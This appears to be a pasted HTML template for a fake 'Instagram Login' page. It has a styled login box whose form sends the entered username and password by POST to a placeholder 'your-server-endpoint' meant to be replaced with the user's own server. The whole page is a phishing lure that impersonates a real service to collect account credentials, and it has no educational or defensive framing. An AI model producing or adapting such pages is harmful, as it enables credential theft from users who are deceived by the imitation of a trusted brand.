Untitled
<!DOCTYPE html> <html> <head> <title>Instagram Login</title> <style> body { font-family: Arial, sans-serif; background-color: #fafafa; margin: 0; padding: 0; } .container { width: 300px; margin: 100px auto; background-color: #fff; padding: 20px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); border-radius: 5px; } .container h2 { margin: 0 0 20px; text-align: center; } .container input { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; } .container button { width: 100%; padding: 10px; background-color: #4267b2; color: #fff; border: none; border-radius: 5px; cursor: pointer; } .container button:hover { background-color: #335299; } </style> </head> <body> <div class="container"> <h2>Log In</h2> <form action="your-server-endpoint" method="POST"> <input type="text" name="username" placeholder="Phone number, username, or email" required> <input type="password" name="password" placeholder="Password" required> <button type="submit">Log In</button> </form> </div> </body> </html>
Leave a Comment